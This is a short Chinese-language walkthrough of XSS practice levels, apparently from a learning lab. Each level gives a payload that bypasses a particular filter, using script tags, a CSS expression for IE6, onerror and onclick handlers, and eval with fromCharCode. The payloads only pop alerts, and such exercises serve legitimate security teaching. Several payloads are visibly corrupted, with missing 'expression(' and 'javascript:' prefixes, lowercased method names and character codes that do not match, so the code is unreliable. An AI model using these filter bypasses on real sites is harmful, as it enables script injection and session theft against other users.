无安全方面的限制，直接使用
<script>alert(/xss/);</script>
限制条件：只能使用css，不允许使用html标签
我们知道利用expression可以用来构造xss，但是只能在ie下面测试，所以下面的测试请在ie6中执行。
body {black;xss:alert(/xss/));/*ie6下测试*/}
限制条件：对html进行了转义，image标签可用。
测试输入的字符会被插入到src地址中，那么可以使用伪协议来绕过。
直接输入
alert( /xss/);
或者你也可以使用事件来绕过，注意闭合语句即可，如下：
1 onerror=alert(/xss/); var a=1
限制条件：使用了关键字过滤。
我测试了一下，大部分都过滤了，有部分未过滤，经测试script/onerror过滤了，但是onclick未过滤，使用onclick事件绕过
<img src=# onclick=alert(/xss/);>
限制条件：使用addslashes对特征字符进行了转义
也就是说我们的xss语句中不能出现单引号，双引号等等特征字符。
直接使用
<script>alert(/xss/);</script>
即可绕过
或者使用string.fromcharcode方法，如下：
<script>eval(string.fromcharcode(97,108,101,114,116,40,47,120,47,41,59));</script>
以上就是xss的小测试是怎样进行的的详细内容。